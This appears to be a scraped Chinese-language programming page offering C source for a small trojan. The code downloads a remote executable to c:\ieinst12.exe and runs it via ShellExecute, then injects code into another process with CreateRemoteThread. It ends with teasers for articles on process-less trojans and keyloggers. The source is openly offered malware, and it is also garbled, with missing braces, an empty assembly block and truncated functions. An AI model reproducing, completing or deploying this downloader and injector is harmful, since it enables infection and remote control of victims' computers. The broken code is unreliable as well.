/* "mini_**********"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/ #include
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消這4行的注釋,可編譯出2k大的檔案
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//動態載入shell32.dll中的shellexecutea函式
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//動態載入urlmon.dll中的urldownloadtofilea函式
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立遠端執行緒,並執行
handle processhandle;
dword pid;
hinstance hshell,hurlmon,hkernel;
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
downfile(null," ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5);
exitprocess(0);
}; void main() //主函式
; size=(dword)lpimagesize;
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //確定起始基址和記憶體映像基址的位置
//4.寫記憶體,建立執行緒
writeprocessmemory(processhandle, newmodule, module, size, null);//寫資料
lpthread_start_routine entrypoint;
__asm
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立遠端執行緒,並執行
//5.關閉物件
closehandle(processhandle);
return;
} ;
//解密函式
void decrpt()
__except(exception_execute_handler)
} return;
};
無dll無程序木馬
include include include include pragma comment lib,shlwapi.lib 引數結構 typedef struct remotepararemotepara bool enableprivilege handle htoken,lpctstr szp...
無程序DLL木馬開發思路與實現
code 1.instbd.exe的源 define unicode define unicode include include include include include guid filterguid guid filterchainguid bool getfilter void fre...
無DLL鍵盤記錄
我們windows系統是建立在訊息傳遞的事件驅動的機制上。用鉤子可以截獲並處理送給其他應用程式的訊息,來完成普通應用程式難以實現的功能。鍵盤記錄者的原理就是使用鍵盤鉤子截獲鍵盤訊息。當然,並非鍵盤記錄一定要使用鉤子,比如wineggdrop的無鉤子鍵盤記錄者。一般書上都會說 全域性鉤子函式必須包含在...